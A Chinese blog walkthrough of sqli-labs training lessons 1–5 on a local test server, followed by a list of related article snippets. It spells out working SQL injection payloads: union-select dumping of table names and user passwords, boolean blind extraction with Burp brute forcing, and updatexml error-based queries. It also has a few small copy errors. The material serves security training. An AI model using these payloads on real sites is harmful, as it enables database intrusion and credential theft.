sql注入靶场

最新推荐文章于 2024-05-09 09:11:23 发布
最新推荐文章于 2024-05-09 09:11:23 发布
阅读量307 收藏 2
点赞数
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45095113/article/details/134650905
版权

第一关:

输入:http://127.0.0.1/sqli-labs-master/Less-1/?id=1

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27--+

使用--+来闭合单引号,证明此处存在字符型的SQL注入。

使用order by 判断字段数:

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20%20order%20by%203--+

在这里先使用order by 4 报错,在使用order by 3正常,证明此处字段数为3

使用union select 判断注入点,使用?id=-1,目的是联合查询,即同时查询两个SQL语句,使用-1是让前面的语句报错,只输出后面的结果。

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,2,3--+

代表在23存在注入点,以选择任意一个进行注入:

直接爆数据库:http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,database(),3--+

爆表名:http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

爆表名:' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

爆数据:' union select 1,group_concat(username),group_concat(password) from users--+

第二关:

输入:http://127.0.0.1/sqli-labs-master/Less-2/?id=1'

发现报错,删除单引号:

输入:http://127.0.0.1/sqli-labs-master/Less-2/?id=1

输入:http://127.0.0.1/sqli-labs-master/Less-2/?id=1' --+报错

输入:http://127.0.0.1/sqli-labs-master/Less-2/?id=1 --+正常

代表存在数字型的SQL注入

使用order by 判断字段数:

输入:http://127.0.0.1/sqli-labs-master/Less-2/?id=1order by 4--+报错

输入:http://127.0.0.1/sqli-labs-master/Less-2/?id=1order by 4--+正常

此处存在3个字段数:

后面和第一关一样操作即可,只需去掉第一关的单引号

第三关:

输入:http://127.0.0.1/sqli-labs-master/Less-3/?id=1'

输入:http://127.0.0.1/sqli-labs-master/Less-3/?id=1'--+

输入:http://127.0.0.1/sqli-labs-master/Less-3/?id=1--+依旧报错,此处和第一关和第二关都不同,使用')闭合,尝试报错

输入:http://127.0.0.1/sqli-labs-master/Less-3/?id=1')--+

即证明此处存在SQL注入,

第四关:

输入:http://127.0.0.1/sqli-labs-master/Less-3/?id=1' --+正常

输入:http://127.0.0.1/sqli-labs-master/Less-3/?id=1") 报错

输入:http://127.0.0.1/sqli-labs-master/Less-3/?id=1")--+正常

证明存在SQL注入。

盲注

第五关:

输入:http://127.0.0.1/sqli-labs-master/Less-5/?id=1,发现返回的是you are in…,并未像之前一样返回了具体数据,因此可以判断是盲注类型的注入!

输入:http://127.0.0.1/sqli-labs-master/Less-5/?id=1'  报错

输入:http://127.0.0.1/sqli-labs-master/Less-5/?id=1’--+正常返回的是you are in…

表明存在SQL注入,且为盲注型的SQL注入:

爆破数据库:

使用length判断长度:?id=1' and length(database())=8--+,这里8是判断数据的长度数,可依次尝试:

当数据库的长度为7时即报错:

知道数据库的长度为7,开始爆破数据库名,使用:

备注:substr(string ,a,b)表示,截取字符串string从第a位开始,截取b

?id=1' and ascii(substr(database(),1,1))=115--+          //115对应的ascii码是s

使用burp进行抓包,暴力破解

设置攻击载荷

按照顺序将数字写下来,依次是:

115   101  99  117   114  105 116  121

对应ASCII码的值为:security

这里解释一下函数limitsubstr

limit 0,1                     #意思是从0个开始,获取第一个

substr(xxx,2,1)            #意思是从字符串xxx的第2个字符开始,截取1个

办法二、使用updatexml函数:

输入:http://127.0.0.1/sqli-labs-master/Less-5/?id=1%27%20and%20updatexml(1,concat(%27!%27,database(),%27!%27),1)--+

updatexml(1,concat('!',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'!'),1)

爆破列:

updatexml(1,concat('!',(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),'!'),1)

爆破数据:

updatexml(1,concat('!',(select id from emails limit 0,1),'!'),1)

浪久1
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WEB常见漏洞之SQL注入靶场篇—1)
One-Fox安全团队的博客
05-05 3803
sqli靶场版SqliLabs 是一个学习 SQL 注入的靶场,它提供了 GET 和 POST 的实验场景,涵盖了联合查询注入、基于报错的注入、基于时间的盲注、基于布尔的盲注、堆叠注入、二次注入以及各种注入绕过。
sql-lap注入靶场
05-02
sql注入练习靶场,实现注入漏洞复现,让你也当一回黑客。安装方法可以自己上网找哦。 使用方法:通过猜解,判断实现密码破解
sql注入靶场练习
weixin_46976845的博客
03-19 5864
pass.1 发现id注入点,尝试联合注入 id=1’ union select 1,database().3 --+或者 id=1’ union select 1,database().3#’ 返回 Welcome Dhakkan Your Login name:Dumb Your Password:Dumb 跑sqlmap 得知数据库账户密码都为root pass.2 注入与1相同 pass.3 括号闭合 注意 ?id=1’) union select 1,database().3 --+ pa
10 个 SQL 注入工具(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
leah126的博客
05-09 2435
其主要的目标是在存在着漏洞的数据库服务器上提供一个远程的外壳,甚至在一个有着严格的防范措施的环境中也能如此。Havij不仅能够自动挖掘可利用的SQL 查询,还能够识别后台数据库类型、检索数据的用户名和密码hash、转储表和列、从数据库中提取数据,甚至访问底层文件系统和执行系统命令,当然前提是有 一个可利用的SQL注入漏洞。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
墨者学院在线靶场--WEB安全--SQL注入
m0_59022585的博客
07-09 1135
测试注入禁用password,注入-1+%75nion+%73elect+1,%64atabase(),(%73elect+group_concat(%70%61%73%73%77%6f%72%64)+%66rom+%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72),4回显得到三个MD5加密的密码。
墨者学院在线靶场中SQL手工注入漏洞测试(MySQL数据库)
qq_47271638的博客
05-07 669
墨者学院在线靶场中SQL手工注入漏洞测试(MySQL数据库) 打开环境 点击箭头指向链接 观察网页的URL发现有id=1,可能存在SQL注入点。 首先对URL进行尝试猜列名数量(字段数),在URL后面添加order by 1或者2 直到出现页面不在显示正常页面,这就说明存在的字段数应该是现在所输入的数字减1。 此处order by 4页面显示正常而order by 5出现页面不正常显示说明只存在4个字段(注此方法只适用于字段数不是很多的时候)。 然后查看哪个字段能显示出来 在URL后面联合查询 un
墨者学院;sql手工注入;access;在线靶场
xiaochenhang的博客
08-20 734
恭喜你 moke 成功登录用户管理后台,KEY: mozhee7cc35d6a83a8978b4a44f56f6d。6、枚举关键表名:正常则存在admin表;通常access数据库都有admin表;8、 枚举字段:正常则页面不报错;通常access表会存在以下三个字段;,因此看到位数以及字母组成形式的字符可以迅速判断可能是MD5编码。5、access数据库没有库名,都是表名;4、输入' 成功闭合报错,有注入漏洞;1、注册账号,启动环境;9、爆一下用户账户和密码;2、 得到端口号和地址;这里枚举失败,翻车;
SQL注入靶场通关
热门推荐
龙卷风摧毁停车场
04-08 1万+
SQL注入靶场通关 SQL注入简介 SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 SQL注入原理 SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。就是在post/getweb表单、输入域名或页面请求的查询字符串中插入SQL命令,使web服务器执行恶意命
sql注入靶场.zip
06-24
这个"sql注入靶场.zip"文件包含了一个名为"sqli-labs-master"的靶场,旨在帮助学习者了解、实践和防御SQL注入攻击。靶场通常由一系列逐步增加难度的挑战组成,让学习者通过实际操作来提升自己的安全技能。 靶场的...
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
PHP、Apache 环境中部署 sqli-labs(SQL 注入靶场) 知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 ...
sql注入#sql靶场
11-02
SQL靶场通常是指用于安全培训、测试和研究SQL注入攻击的环境,它可以帮助开发者和安全人员了解SQL注入的危害,学习如何防御这种攻击。 在SQL注入中,攻击者通过在网页表单、URL参数或其他用户输入点输入特定的SQL...
sql注入讲解ppt.pptx
08-10
2. SQLi-Labs:SQL 注入的靶场,提供了不同知识点的题目,需要与 PHPStudy 结合使用。 3. Hackbar:写注入的 payload 的工具,大有用处。 4. Burpsuite:多功能的工具,可以写 payload 上传,也可以爆破。 四、...
墨者学院;SQL手工注入;在线靶场;SQLsever;
xiaochenhang的博客
08-21 1199
object ():数据库中每个对象都有一个唯一的id值,object_id(name)可以根据表对象名称得到表对象的ID,object_id()只能返回用户创建的对像的ID,像以sys开头的表都是系统表所以返回不了的。sa权限:数据库操作,⽂件管理,命令执⾏,注册表读取等system:SQLServer数据库的最 ⾼权限。syscolumns:记录了数据库中所有表的字段,常⽤字段为id、name和xtype。id为标识,name为对应的表名和字段名,xtype为所对应的对象类型。
SQL注入靶场_辛巴猫舍
cxllwh的博客
12-22 775
注:可能有的人喜欢用GROUP_CONCAT 函数,即通过,间隔将多行数据进行整合在一行输出,虽然不用limit去一个一个的查询,但是有的站输出点是由长度限制的,所以会出现输出不完整的情况,在此建议大家习惯利用limit分页查询来输出。输入order by 1和order by 2时页面正常,到order by 3的时候页面显示异常,由此可以得到字段数为2。3.寻找回显点,构造?1.首先我们查一下该数据库有几行,将id=1分别换为2,3,4进行测试,发现到id=4时页面不再显示。漏洞类型:SQL注入
SQL注入靶场搭建
Aquarius_ego的博客
04-01 6121
1.windows下搭建——利用sqli-labs 2.linux下用docker搭建 docker search sqli-labs docker pull docker.io/acgpiano/sqli-labs 拉取sqli镜像 docker run -dt --name sqli-labs -p 8088:80 --rm docer.io/acgpiano/sqli-labs 运行容器,加载镜像 生成一个容器 docker ps -s 查看容器 ifconfig查看ip
SQL注入实验靶场(附环境)
m0_74025111的博客
11-05 449
​ 扫出了一个库,证明信息就在这个库里面,得知信息在此库里面就好办了,直接爆表和字段信息sqlmap -u http://192.168.171.131/cat.php?​ 是一个登录页面,我们不知道密码,那我们就通过数据库来进行获取信息,在前面的源码中发现存在id参数注入,测试一下该靶场是否存在sql注入。页面没有什么可用的资源,查看源码,从源码可以发现是存在id参数注入,文件上传。进入到上传目录,发现了这个页面存在图片和信息类的,还有相关的路径。通过路径还可以发现有admin目录的,直接访问一手。
测试具有44个漏洞点的简单小靶场-SQL注入
虚闻界的博客
08-11 1248
关于常见SQL注入的经验及小技巧,以及自己的一些学习经历
sql注入靶场地址以及谷歌hackbar插件安装
qq_64153534的博客
02-20 373
1.靶场地址 不支持php7 https://github.com/Audi-1/sqli-labs 支持php7 https://github.com/goldroad/sqli_labs_sqli-version​​​​​​ 点击code→download下载 2.谷歌hackbar插件安装 下载地址:https://github.com/Mr-xn/hackbar2.1.3 选择合适版本下载,也可以点击code→download下载,之后把不要的都可以删掉 点击谷歌右
自己搭建sql注入靶场及sqlmap脚本利用
Bu2n的博客
01-12 1416
搭建环境数据库准备工作靶场第一关靶场第二关sqlmap脚本编写运用脚本参考资料 搭建环境 Debian10.x apache2 MariaDB10.x php7.3 环境搭建可参考 https://blog.csdn.net/weixin_43623271/article/details/122372456 数据库准备工作 下面的操作可以根据自己的喜好更改,如数据库名字,表名,记录,用户名(也可以用root),总之可以随便改 创建一个test数据库 创建一个class数据表 插入几条数据 .
SQL注入靶场sqli-labs
12-20
sqli-labs是一个基于SQL注入的游戏教程,它可以帮助用户更好地了解SQL注入的语法和原理。要搭建sqli-labs靶场,您可以按照以下步骤进行操作: 1. 下载sqli-labs项目:您可以从GitHub上的https://github.com/Audi-1/sqli-labs下载sqli-labs项目。 2. 安装Web服务器:您需要在本地或者服务器上安装一个Web服务器,例如Apache或Nginx。 3. 将sqli-labs项目放置在Web服务器的根目录下:将下载的sqli-labs项目解压,并将解压后的文件夹放置在Web服务器的根目录下。 4. 配置数据库:sqli-labs使用MySQL数据库作为后端数据库。您需要创建一个新的数据库,并将数据库的连接信息配置到sqli-labs项目的配置文件中。 5. 导入数据库表结构:在MySQL数据库中,导入sqli-labs项目提供的SQL文件,以创建所需的表结构和数据。 6. 启动Web服务器:启动您的Web服务器,并确保sqli-labs项目可以通过浏览器访问。 7. 访问sqli-labs靶场:在浏览器中输入您的Web服务器地址,加上sqli-labs项目的路径,即可访问sqli-labs靶场。 请注意,搭建sqli-labs靶场需要一定的技术基础和安全意识。在进行任何实验之前,请确保您已经了解了SQL注入的风险,并采取适当的安全措施,以避免对系统造成损害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值